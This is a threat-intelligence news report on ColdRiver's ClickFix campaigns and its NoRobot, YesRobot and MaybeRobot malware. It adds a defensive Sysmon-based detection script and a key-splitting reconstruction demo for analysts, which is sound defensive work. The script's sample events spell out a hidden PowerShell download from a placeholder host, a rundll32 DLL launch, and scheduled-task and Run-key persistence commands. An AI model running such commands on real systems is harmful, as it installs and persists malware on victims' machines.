Specialists from the Google Threat Intelligence Group (GTIG) report that the Russian-speaking hacker group ColdRiver is stepping up its activity and employing new malware families (NoRobot, YesRobot, MaybeRobot), which are deployed via complex delivery chains starting with social engineering and ClickFix-type attacks.
ClickFix attacks are built on social engineering. Typically, victims are lured to malicious sites and tricked into copying to the clipboard and executing certain PowerShell commands—in other words, manually infecting their systems with malware.
Attackers justify the need to run these commands as a way to fix issues with displaying content in the browser or demand that the user solve a fake CAPTCHA.
Although ClickFix attacks most often target Windows users, who are persuaded to run PowerShell commands, security researchers have already warned about campaigns aimed at macOS and Linux users.
According to ESET, the use of ClickFix as an initial access vector increased by 517% from the second half of 2024 to the first half of 2025.
According to researchers, ColdRiver (aka UNC4057, Callisto, and Star Blizzard) stopped using the LostKeys malware after it was thoroughly studied and documented by GTIG in May 2025.
At the time, researchers reported that the LostKeys malware was used in attacks against Western governments, journalists, think tanks, and other organizations. The malware was employed for espionage, and its capabilities included exfiltrating data based on a hard-coded list of file extensions and directories.
After the public disclosure of information about LostKeys, the hackers completely abandoned this malware and, in less than a week, began deploying new malicious tools — NoRobot, YesRobot, and MaybeRobot.
According to analysts, the first was NoRobot — a malicious DLL file delivered via a ClickFix attack and fake CAPTCHAs. Under the guise of passing verification, the hackers tricked victims into launching the malware via rundll32.
It is worth noting that researchers at Zscaler analyzed NoRobot in September 2025 and named this campaign BaitSwitch, while its payload was dubbed Simplefix.
As Google now reports, NoRobot establishes persistence in the system by modifying the registry and creating scheduled tasks. The malware also initially downloaded Python 3.8 for Windows onto victims’ systems to prepare the machine for infection with the Python-based YesRobot backdoor.
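The steps described so far (a pasted PowerShell one-liner, a DLL launched through rundll32, then registry and scheduled-task persistence) give a defender concrete process-creation shapes to hunt for. The Python triage routine below is an added example, not GTIG's or Zscaler's tooling. The events are constructed and modelled on Sysmon Event ID 1 fields, and the rules are generic assumptions (a shell or script host spawning rundll32 with a DLL under a user-writable path, schtasks or reg.exe pointing there); they are not published NoRobot indicators, and the task and key names are placeholders, since the report above gives none.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 record (constructed sample data)."""
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


# Directories a standard user can write to; a DLL run from here is suspect.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
# Download primitives typical of a copy-pasted ClickFix one-liner.
DOWNLOAD_HINT = re.compile(
    r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|WebClient)\b", re.I)
# Parents from which a rundll32 launch of a user-writable DLL is suspicious.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "explorer.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)


def base(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: ProcEvent) -> List[str]:
    """Names of the rules an event matches; an empty list means nothing fired."""
    img, parent, cmd = base(event.image), base(event.parent_image), event.cmdline
    hits: List[str] = []
    # 1. PowerShell started from the desktop shell (Win+R / Explorer) with a
    #    download primitive: the shape of a pasted ClickFix command.
    if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
            and DOWNLOAD_HINT.search(cmd):
        hits.append("clickfix_paste_download")
    # 2. rundll32 loading a DLL from a user-writable path, launched by a shell
    #    or script host: the rundll32 launch described in the report.
    if img == "rundll32.exe" and parent in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
        hits.append("rundll32_user_writable_dll")
    # 3. Scheduled task whose action points into a user-writable directory.
    if img == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
        hits.append("schtasks_persistence")
    # 4. Run / RunOnce key written through reg.exe.
    if img == "reg.exe" and re.search(r"\badd\b", cmd, re.I) and RUN_KEY.search(cmd):
        hits.append("runkey_persistence")
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> matched rules for every event that fired at least one rule."""
    findings: Dict[int, List[str]] = {}
    for e in events:
        hits = triage(e)
        if hits:
            findings[e.pid] = hits
    return findings


# Constructed sample events: four stages of a ClickFix-style chain plus three
# benign look-alikes. Paths, DLL/task names and the .invalid host are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "Invoke-WebRequest http://placeholder.invalid/verify -OutFile $env:TEMP\v.dll"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(101, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\v.dll,Start",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(102, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn Updater /sc minute /mo 15 /tr "rundll32.exe C:\Users\alice\AppData\Roaming\v.dll,Start"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(103, r"C:\Windows\System32\reg.exe",
              r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "rundll32.exe C:\Users\alice\AppData\Roaming\v.dll,Start" /f',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # Benign: a user listing files, an installer using rundll32 from System32,
    # and a service host.
    ProcEvent(104, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice\Downloads",
              r"C:\Windows\explorer.exe"),
    ProcEvent(105, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
              r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(106, r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs", r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Each rule is deliberately narrow (parent plus image plus a path or command-line feature) so that ordinary administration, such as PowerShell run from Explorer without a download primitive or rundll32 loading a System32 DLL, does not fire; the value is in the sequence of four hits on one host within a short window rather than in any single match.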
However, the use of YesRobot was short-lived—most likely because installing Python was an obvious artifact that drew attention. ColdRiver abandoned this approach in favor of another backdoor—a PowerShell script called MaybeRobot (which Zscaler refers to as Simplefix).
Since early June 2025, the “radically simplified” version of NoRobot began delivering MaybeRobot, which supports only three commands:
- downloading and executing payloads from a specified URL;
- executing commands via the command line;
- executing arbitrary PowerShell blocks.
After execution, MaybeRobot returns results to various command-and-control servers, providing ColdRiver with feedback on the success of the operations.
Researchers report that development of MaybeRobot now appears to be almost complete, and the attackers are currently focusing more on refining NoRobot to make the malware more stealthy and effective.
Additionally, researchers note that the malware delivery chain went from complex to simpler and then back to complex. The current chain splits cryptographic keys across multiple components, so decrypting the final payload depends on correctly recombining the parts.
“This was likely done to complicate the reconstruction of the infection chain, because if one of the downloaded components is missing, the final payload will not decrypt properly,” the GTIG report states.
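The quoted point, that a payload cannot be decrypted when any one downloaded component is missing, is easiest to see with a small reconstruction an analyst might run over recovered stages. The Python below is an added example and not GTIG's code; the scheme (XOR secret sharing of the key across N components, with the final stage sealed encrypt-then-MAC so a wrong key is reported rather than producing silent garbage) is an assumption for illustration, not a description of ColdRiver's actual implementation, and all values are constructed.

```python
import hashlib
import hmac
import os
from typing import List, Optional

TAG_LEN = 32  # HMAC-SHA256 tag prepended to the ciphertext


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key: bytes, parts: int) -> List[bytes]:
    """XOR secret sharing: parts-1 random shares, last share fixes the XOR to key.
    Assumed scheme for the demo, not the one used by the malware."""
    shares = [os.urandom(len(key)) for _ in range(parts - 1)]
    last = key
    for s in shares:
        last = xor(last, s)
    return shares + [last]


def recombine(shares: List[bytes]) -> bytes:
    """XOR all shares; with any one missing the result is unrelated to the key."""
    key = bytes(len(shares[0]))
    for s in shares:
        key = xor(key, s)
    return key


def keystream(key: bytes, n: int) -> bytes:
    """Counter-mode keystream from SHA-256 (toy construction for the demo)."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: tag || ciphertext."""
    ct = xor(plaintext, keystream(key, len(plaintext)))
    return hmac.new(key, ct, hashlib.sha256).digest() + ct


def open_sealed(key: bytes, blob: bytes) -> Optional[bytes]:
    tag, ct = blob[:TAG_LEN], blob[TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, ct, hashlib.sha256).digest()):
        return None  # wrong key: at least one component is missing or altered
    return xor(ct, keystream(key, len(ct)))


def recover_payload(shares: List[bytes], blob: bytes) -> Optional[bytes]:
    """What an analyst runs over recovered components; None means the set is incomplete."""
    return open_sealed(recombine(shares), blob)


# Constructed demo values: a 32-byte key split over three components.
DEMO_KEY = hashlib.sha256(b"constructed demo key").digest()
DEMO_PAYLOAD = b"final stage (constructed placeholder bytes)"
DEMO_SHARES = split_key(DEMO_KEY, 3)
DEMO_BLOB = seal(DEMO_KEY, DEMO_PAYLOAD)

if __name__ == "__main__":
    print("all three components:", recover_payload(DEMO_SHARES, DEMO_BLOB))
    print("two of three:", recover_payload(DEMO_SHARES[:2], DEMO_BLOB))
```

The practical consequence for incident response is the one the report implies: a capture that preserved the ClickFix page and two of three downloaded stages is not enough to recover the final payload, so collection should aim at every fetched component and the order in which they were fetched, not only the file that was ultimately executed.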
ColdRiver attacks delivering NoRobot and subsequent payloads were observed between June and September 2025. The group typically distributes malware via phishing attacks, and researchers have not yet determined why the hackers switched to ClickFix attacks.
One expert theory holds that the group uses the NoRobot and MaybeRobot malware families against targets that were previously compromised via phishing, meaning their emails and contacts had already been stolen. The retargeting may be aimed at “obtaining additional intelligence directly from their devices,” the researchers suggest.